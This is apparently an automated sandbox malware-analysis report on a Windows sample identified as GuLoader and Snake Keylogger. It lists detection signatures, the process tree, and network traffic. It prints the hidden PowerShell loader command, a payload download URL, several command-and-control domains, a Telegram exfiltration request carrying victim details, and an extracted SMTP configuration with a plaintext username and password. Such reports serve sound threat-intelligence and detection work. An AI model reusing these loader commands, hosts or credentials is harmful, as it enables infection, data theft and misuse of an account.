Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DOC11042024.exe

Overview

General Information

Sample name:DOC11042024.exe
Analysis ID:1548204
MD5:2119b4c15a036b7e407a7483a89ecdbf
SHA1:37c3c28bba3f2482e92b3b0ef570c2ba6f3167a8
SHA256:66c79a5e56a0b28126534ded1e9dd50e2de460fb671c49e7cf7a365568c7067b
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • DOC11042024.exe (PID: 2824 cmdline: "C:\Users\user\Desktop\DOC11042024.exe" MD5: 2119B4C15A036B7E407A7483A89ECDBF)
    • powershell.exe (PID: 1372 cmdline: powershell.exe -windowstyle hidden "$Unproded=Get-Content -raw 'C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\Isbjergs.Krs';$Acockbill=$Unproded.SubString(73125,3);.$Acockbill($Unproded) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 1128 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "tony@jballosewage.com", "Password": "Jc.2o3o@", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000002.00000002.2345390385.000000000A530000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: msiexec.exe PID: 1128JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: msiexec.exe PID: 1128JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Msiexec Initiated Connection
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 141.98.10.40, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1128, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49787
          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1372, TargetFilename: C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\DOC11042024.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Unproded=Get-Content -raw 'C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\Isbjergs.Krs';$Acockbill=$Unproded.SubString(73125,3);.$Acockbill($Unproded) ", CommandLine: powershell.exe -windowstyle hidden "$Unproded=Get-Content -raw 'C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\Isbjergs.Krs';$Acockbill=$Unproded.SubString(73125,3);.$Acockbill($Unproded) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DOC11042024.exe", ParentImage: C:\Users\user\Desktop\DOC11042024.exe, ParentProcessId: 2824, ParentProcessName: DOC11042024.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Unproded=Get-Content -raw 'C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\Isbjergs.Krs';$Acockbill=$Unproded.SubString(73125,3);.$Acockbill($Unproded) ", ProcessId: 1372, ProcessName: powershell.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-04T07:13:21.664986+010020229301A Network Trojan was detected4.245.163.56443192.168.2.549704TCP
          2024-11-04T07:14:01.197295+010020229301A Network Trojan was detected4.245.163.56443192.168.2.549932TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-04T07:13:42.525588+010028033053Unknown Traffic192.168.2.549819188.114.96.3443TCP
          2024-11-04T07:13:44.137122+010028033053Unknown Traffic192.168.2.549829188.114.96.3443TCP
          2024-11-04T07:13:49.154916+010028033053Unknown Traffic192.168.2.549864188.114.96.3443TCP
          2024-11-04T07:13:52.375517+010028033053Unknown Traffic192.168.2.549887188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-04T07:13:40.417427+010028032742Potentially Bad Traffic192.168.2.549804193.122.6.16880TCP
          2024-11-04T07:13:41.823378+010028032742Potentially Bad Traffic192.168.2.549804193.122.6.16880TCP
          2024-11-04T07:13:43.417133+010028032742Potentially Bad Traffic192.168.2.549825193.122.6.16880TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-04T07:13:37.121948+010028032702Potentially Bad Traffic192.168.2.549787141.98.10.4080TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "tony@jballosewage.com", "Password": "Jc.2o3o@", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}
          Multi AV Scanner detection for submitted file
          Source: DOC11042024.exeVirustotal: Detection: 19%Perma Link
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.4% probability

          Location Tracking

          barindex
          Tries to detect the country of the analysis system (by using the IP)
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: DOC11042024.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49811 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49901 version: TLS 1.2
          Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2324502580.0000000002A48000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2344258640.00000000081EC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2344258640.00000000081EC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Targetore.pdbic source: powershell.exe, 00000002.00000002.2344628886.00000000082EE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: em.Core.pdb source: powershell.exe, 00000002.00000002.2344258640.00000000081EC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5) source: powershell.exe, 00000002.00000002.2344258640.00000000081EC000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\DOC11042024.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
          Source: C:\Users\user\Desktop\DOC11042024.exeCode function: 0_2_004061E5 FindFirstFileW,FindClose,0_2_004061E5
          Source: C:\Users\user\Desktop\DOC11042024.exeCode function: 0_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405731
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 249731E0h5_2_24972DC8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24972C19h5_2_24972968
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24970D0Dh5_2_24970B30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24971697h5_2_24970B30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2497CF49h5_2_2497CCA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2497D3A1h5_2_2497D0F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2497FAB9h5_2_2497F810
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_24970853
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_24970040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 249731E0h5_2_24972DB8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2497DC51h5_2_2497D9A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 249731E0h5_2_2497310E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2497D7F9h5_2_2497D550
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2497E959h5_2_2497E6B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2497E0A9h5_2_2497DE00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2497E501h5_2_2497E258
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_24970673
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2497F661h5_2_2497F3B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2497EDB1h5_2_2497EB08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2497F209h5_2_2497EF60

          Networking

          barindex
          Uses the Telegram API (likely for C&C communication)
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2004/11/2024%20/%2016:35:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49825 -> 193.122.6.168:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49804 -> 193.122.6.168:80
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49787 -> 141.98.10.40:80
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49704
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49887 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49864 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49829 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49819 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49932
          Source: global trafficHTTP traffic detected: GET /nMcrGmhC252.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: vyebetsh.sa.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49811 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2004/11/2024%20/%2016:35:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /nMcrGmhC252.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: vyebetsh.sa.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: vyebetsh.sa.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 04 Nov 2024 06:13:54 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: DOC11042024.exe, DOC11042024.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000002.00000002.2327684174.00000000056F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000002.00000002.2324911323.00000000047E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000002.00000002.2324911323.0000000004691000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: msiexec.exe, 00000005.00000003.2697286494.000000000620D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3269852832.000000000620D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3281075405.0000000021170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://vyebetsh.sa.com/nMcrGmhC252.bin
          Source: powershell.exe, 00000002.00000002.2324911323.00000000047E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: powershell.exe, 00000002.00000002.2324911323.0000000004691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjq
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021CF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021CF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021CF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021CF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20a
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021DD2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021E03000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3282055116.0000000021DC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: msiexec.exe, 00000005.00000002.3282055116.0000000021DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBjq
          Source: powershell.exe, 00000002.00000002.2327684174.00000000056F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000002.00000002.2327684174.00000000056F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000002.00000002.2327684174.00000000056F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: powershell.exe, 00000002.00000002.2324911323.00000000047E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000002.00000002.2327684174.00000000056F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
